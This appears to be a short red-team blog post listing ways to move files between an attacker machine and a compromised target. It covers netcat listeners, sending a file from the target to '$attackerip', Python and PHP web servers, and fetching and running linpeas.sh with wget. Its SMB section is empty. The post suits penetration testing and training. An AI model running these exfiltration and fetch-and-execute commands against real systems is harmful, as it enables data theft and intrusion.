Red Team File Transfers, All the Ways

ice-wzl
6 min readAug 12, 2023

Netcat File Transfer

  • Step 1
  • Create a file on the target box in the /tmp directory
touch file.txt
  • Set up the listener and direct STDOUT into the new file
nc -nlvp 1234 > file.txt
  • Send the file
nc [target box ip] 1234 < file-to-be-transfered.txt

Method Two

  • On the attacker machine run:
nc -lvp 443> transfer.txt
  • On the target run:
cat transfer.txt | nc $attackerip 443

NC Transfer with gzip data

//on target machine 
nc -nvlp 10000 | gzip -d > .y
//local machine
cat ~/tools/static-binaries/socat/socat | gzip -c - | nc 127.0.0.1 10000
// check md5 hashes match on both systems

Web Servers:

Python HTTP Server File Transfer

  • Start the Python Server in the directory where the file is located that you want to transfer
  • Use the ip address assigned to your box, if there is a vpn involved use the vpn address
python3 -m http.server
  • Above is for python3
python -m SimpleHTTPServer 8000
  • Above is for python
  • You can optionally specify a port that you want the server to run on (it defaults to 8000)
python3 -m http.server 80
  • wget the file from the target box
wget http://172.16.6.1:8000/linpeas.sh
  • Change permissions
  • Run the transferred file
chmod +x linpeas.sh
./linpeas.sh

PHP Web Server

php -S $ip:80 #on attacker machine to host the file 
wget http://[attacker-ip]:80/file-to-download

Metasploit Web Server

use auxiliary/server/ftp
auxiliary/server/tftp
  • Follow the metasploit instructions. They are rather straightforward

SMB File Transfer

--

--

ice-wzl

Reverse Engineer, Red Teamer, CTF fan & creator